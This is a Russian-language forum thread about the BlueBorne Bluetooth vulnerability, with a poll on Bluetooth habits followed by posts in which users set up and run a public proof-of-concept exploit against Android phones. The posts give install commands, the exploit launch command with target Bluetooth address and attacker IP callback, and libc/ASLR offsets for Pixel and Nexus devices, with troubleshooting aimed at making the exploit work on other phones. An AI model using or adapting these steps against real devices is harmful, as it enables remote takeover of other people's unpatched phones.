BlueBorne!!! Найдена уязвимость, под угрозой основные мобильные телефоны и пк

  • Автор темы Автор темы Air7771
  • Дата начала Дата начала

Используете ли вы Bluetooth и как часто?

  • Постоянно включен на мобильном устройстве

    Голосов: 4 6,1%
  • да

    Голосов: 0 0,0%
  • нет

    Голосов: 53 80,3%
  • Включаю для передачи данных хотя бы раз в неделю

    Голосов: 9 13,6%

  • Всего проголосовало
    66
Посмотрел. Это вроде официальный PoC. Должен быть рабочим, но он только для андройд и заточен под Google Pixel. Я думаю можно переделать под другой смартфон. Пробовал на своих смартфонах - пишет ошибку подключения.
Зависимости и все такое думаю уже стоит у тех, кто тестил прошлые версии скриптов, синезуб на линукс тоже включить не проблема.

sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>. Это типо сам сплойт. Пишем без <> mac адрес Bluetooth цели(android), и второе - видимо IP машины атакующего.
"IP должен быть доступен от жертвы (должен быть IP-адрес машины, на которой выполняется эксплойт)".
Я так понял это далеко не полный пакет информации даже по Android. У кого есть Google Pixel - попробуйте натравить скрипт на него.
 
дополню, установка:

Код:
sudo apt-get install libbluetooth-dev
sudo pip2 install pybluez pwn
git clone https://github.com/ArmisSecurity/blueborne.git

пользуемся:

Код:
sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>

Демо:

У тебя работает?
[doublepost=1509271775,1509269329][/doublepost]На видео используется внешний Bluetooth адаптер. "
A CSR USB bluetooth adapter. We need to change the MAC address, and so we use a vendor specific HCI command to do this
for the CSR bluetooth adapter.
- An alternative adapter can also be used - the only thing to alter is the set_rand_bdaddr function.
"
[doublepost=1509271849][/doublepost]Set hci0 to new rand BDADDR f4:61:47:8e:a2:12
на этом этапе у меня зависает
[doublepost=1509271934][/doublepost]Автор на видео вообще без адреса пишет "sudo python2 doit.py hci0 XX:XX:XX:XX:XX:XX" и поехал
[doublepost=1509272086][/doublepost]а может дело в :
# For Pixel 7.1.2 patch level Aug/July 2017
LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1 - 56 # system + 1
LIBC_SOME_BLX_OFFSET = 0x1a420 + 1 - 608 # eventfd_write + 28 + 1

# For Nexus 5X 7.1.2 patch level Aug/July 2017
#LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1
#LIBC_SOME_BLX_OFFSET = 0x1a420 + 1
Ни того, ни другого у меня нет.
[doublepost=1509272577][/doublepost]Да, дело в
"Unsupported manufacturer"
[doublepost=1510954632][/doublepost]


Вот свежачок - автор похоже понял как подстраивать обход ASLR под разные устройства, и даже для Nexus 5 выложил.

Пока пробую на своем Nexus 5, но трабла та ж, что и раньше. Коннект успешный, дальше молчит. Как и предпологалось 085 PoC помогает (дамп памяти). Будем смотреть.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!